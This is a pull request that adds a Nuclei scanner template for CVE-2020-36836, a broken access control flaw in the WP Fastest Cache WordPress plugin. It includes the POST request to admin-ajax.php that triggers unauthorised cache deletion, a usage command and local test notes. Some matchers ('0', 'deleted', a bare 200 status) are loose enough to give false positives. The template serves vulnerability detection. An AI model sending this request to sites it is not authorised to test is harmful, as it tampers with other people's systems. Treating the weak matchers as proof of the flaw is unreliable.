### PR TITLE
Add CVE-2020-36836 detection template for WP Fastest Cache (≤ 0.9.0.2)

### DIFF
--- a/http/cves/2020/CVE-2020-36836.yaml
+++ b/http/cves/2020/CVE-2020-36836.yaml
@@ -1,0 +1,48 @@
+id: CVE-2020-36836-wp-fastest-cache
+info:
+  name: CVE-2020-36836 - WP Fastest Cache (unauthorized cache deletion)
+  author: gsharma101
+  severity: medium
+  description: |
+    WP Fastest Cache <= 0.9.0.2 allowed low-privilege WordPress users (for example:
+    Subscriber) to trigger cache deletion via the AJAX action `wpfc_delete_cache`
+    on `admin-ajax.php`. This template verifies plugin presence and then attempts
+    the delete-cache AJAX call to detect the issue.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-36836
+  tags: cve,wordpress,wp,wp-fastest-cache
+
+requests:
+  - id: check-plugin
+    name: check plugin admin page
+    method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin.php?page=wpfastestcacheoptions"
+    headers:
+      User-Agent: nuclei-scan
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "WP Fastest Cache Options"
+
+  - id: exploit-check
+    name: attempt unauthorized cache delete
+    method: POST
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php"
+    headers:
+      User-Agent: nuclei-scan
+      Content-Type: application/x-www-form-urlencoded
+    body: "action=wpfc_delete_cache"
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - "All cache files have been deleted"
+          - "All cache files"
+          - "deleted"
+          - "0"


### PR DESCRIPTION
/claim #13098

### PR / Template Details

* Introduced **CVE-2020-36836** detection template targeting WP Fastest Cache plugin (≤ 0.9.0.2).
* Issue: **Broken Access Control** → allows users with **subscriber role** to trigger cache deletion requests through `admin-ajax.php`.

**References**:

* [https://nvd.nist.gov/vuln/detail/CVE-2020-36836](https://nvd.nist.gov/vuln/detail/CVE-2020-36836)
* [https://wpscan.com/vulnerability/cve-2020-36836](https://wpscan.com/vulnerability/cve-2020-36836)
* [https://plugins.trac.wordpress.org/changeset/234347/wp-fastest-cache](https://plugins.trac.wordpress.org/changeset/234347/wp-fastest-cache)

---

### Local Validation

✔ Tested against a local WordPress environment with:

* WordPress v6.8.2
* WP Fastest Cache v0.9.0.2

**Steps performed:**

1. Logged in as a **subscriber** (non-admin).
2. Sent request to `/wp-admin/admin-ajax.php?action=wpfc_delete_cache`.
3. Server responded with `200 OK` → confirms the issue.

---

### Usage Example

```bash
nuclei -t http/cves/2020/CVE-2020-36836.yaml \
  -u http://127.0.0.1:8000 \
  -H "Cookie: <subscriber_cookie_here>" \
  -debug
```

---

### Debug Evidence & logs

The scan returned:

* `200 OK` while logged in as subscriber
* Confirms that cache deletion action is improperly exposed
* [CVE-2020-36836-debug.log](https://github.com/user-attachments/files/22184403/CVE-2020-36836-debug.log)

---

### Extra Info

* Severity: **Medium**
* Category: WordPress / Plugin / Access Control
* Tested locally, reproducible.
